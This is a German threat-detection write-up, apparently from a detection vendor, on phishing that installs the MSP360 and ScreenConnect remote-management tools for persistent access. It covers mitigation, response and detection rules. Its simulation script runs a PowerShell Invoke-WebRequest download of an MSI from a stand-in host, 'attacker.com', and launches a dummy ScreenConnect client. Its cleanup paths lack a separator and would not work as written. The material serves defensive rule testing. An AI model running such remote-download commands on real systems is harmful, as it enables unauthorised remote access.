Phishing Missbraucht RMM-Tools für Persistenten Zugang
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Bedrohungsakteure nutzen Phishing-Kampagnen, um ein legitimes MSP360 RMM-Installationsprogramm als vertrauenswürdige Software getarnt auszuliefern. Nach dem Start stellt der Installer Persistenz her und lädt anschließend ConnectWise ScreenConnect herunter und stellt es bereit, wodurch Angreifer einen zusätzlichen Fernzugriffskanal erhalten. Dies ermöglicht weitere Aktivitäten nach der Kompromittierung, einschließlich Credential-Diebstahl und Sammlung sensibler Daten.
Untersuchung
Microsoft Defender-Experten identifizierten mehrere Phishing-Köder, die Zoom, Adobe und legitime Besprechungseinladungen imitieren, um MSP360 v2.5.0.67 zu verteilen. Forscher rekonstruierten die Infektionskette, indem sie die anfängliche Benutzerausführung und UAC-Erhöhung durch Serviceinstallation und Bereitstellung sekundärer RMM-Tools nachverfolgten. Die Untersuchung ergab auch, dass Angreifer vertrauenswürdige Cloud-Plattformen wie Amazon S3 und Dropbox missbrauchen, um bösartige Payloans zu hosten.
Abschwächung
Organisationen sollten genehmigte RMM-Tools streng durchsetzen, indem sie MFA einsetzen und Anwendungssteuerungsrichtlinien implementieren, um unbefugte Installationen zu verhindern. Zertifikatbasierte Sperrregeln können weiterhin bestimmte signierte Anwendungen einschränken. Die Verstärkung der Endpunktsicherheit durch cloud-gelieferte Antiviren-Schutzmaßnahmen und Regeln zur Reduzierung der Angriffsoberfläche ist ebenfalls unerlässlich, um das Expositionsrisiko zu verringern.
Reaktion
Wenn unbefugte RMM-Installationen entdeckt werden, sollten Sicherheitsteams sofort die Anmeldeinformationen im Zusammenhang mit den betroffenen Dienstinstallationen zurücksetzen. Ein vermuteter Systemkompromiss erfordert eine umfassende Untersuchung, um den gesamten Angriffsumfang zu bestimmen. Endpunkt-Detektionsprotokolle sollten überprüft werden, um verdächtige Remote-Management-Sitzungen und damit verbundene Aktivitäten nach der Kompromittierung zu identifizieren.
Angriffsablauf
Wir aktualisieren diesen Teil noch.
Erkennungen
Herunterladen oder Hochladen über Powershell (via cmdline)
Ungewöhnliche Code Page Ausführungsänderung (via cmdline)
Alternative Fernzugriffs-/Managementsoftware (via process_creation)
Aufruf verdächtiger .NET-Methoden von Powershell (via powershell)
Verdächtige Befehls- und Kontrollanfrage durch DNS-Anfrage an ungewöhnliche Top-Level-Domain (TLD) (via dns)
IOCs (HashSha256) zu erkennen: Phishing missbraucht RMM-Tools für persistenten Zugriff
IOCs (HashSha1) zu erkennen: Phishing missbraucht RMM-Tools für persistenten Zugriff
Erkenne PowerShell Invoke-WebRequest für den Remote-Download von MSI-Paketen [Windows PowerShell]
Phishing missbraucht RMM-Tools für persistenten Zugriff [Windows Prozess Erstellung]
Simulationausführung
-
Angriffsgeschichte & Befehle: Ein Angreifer startet eine Spearphishing-Kampagne. Das Opfer klickt auf einen Link, der ein PowerShell-Einzeilenbefehl auslöst. Dieser Befehl verwendet
Invoke-WebRequestzum Herunterladen vonClientSetup.msi(Simulation des ScreenConnect-Installers) von einem Remote-Server. Nachdem es heruntergeladen wurde, führt der Angreifer das MSI aus, und der letzte Schritt der Simulation beinhaltet das Starten vonScreenConnect.WindowsClient.exeum die etablierte Fernzugriffssitzung nachzuahmen. Diese Sequenz soll dieAuswahl_2 UND Auswahl_3Logik der Regel auslösen. -
Regressionstest-Skript:
# Simulation des Phishing-basierten RMM-Deployments $tempDir = $env:TEMP $msiName = "ClientSetup.msi" $exeName = "ScreenConnect.WindowsClient.exe" $msiPath = Join-Path $tempDir $msiName $exePath = Join-Path $tempDir $exeName # 1. Simuliere den PowerShell-Download (Auswahl 2 Teil A) Write-Host "[+] Simulation des PowerShell-Downloads des MSI..." # Verwendung einer Dummy-Datei zur Simulation des MSI-Downloads New-Item -Path $msiPath -ItemType File -Force # Dieser Befehl entspricht der 'Invoke-WebRequest'- und 'ClientSetup.msi'-Logik der Regel powershell.exe -Command "Invoke-WebRequest -Uri 'http://attacker.com/ClientSetup.msi' -OutFile '$msiPath'" # 2. Erstelle eine Dummy-Ausführungsdatei zur Simulation des ScreenConnect-Clients (Auswahl 3) Write-Host "[+] Erstellen einer Dummy-ScreenConnect-Ausführungsdatei..." New-Item -Path $exePath -ItemType File -Force # 3. Führe den Client aus (Auswahl 3 und Abschluss von Auswahl 2) Write-Host "[+] Ausführen des ScreenConnect Clients..." Start-Process -FilePath $exePath -
Bereinigungskommandos:
# Bereinigen von Simulationsartefakten Remove-Item -Path "$env:TEMPClientSetup.msi" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPScreenConnect.WindowsClient.exe" -Force -ErrorAction SilentlyContinue Write-Host "[+] Bereinigung abgeschlossen."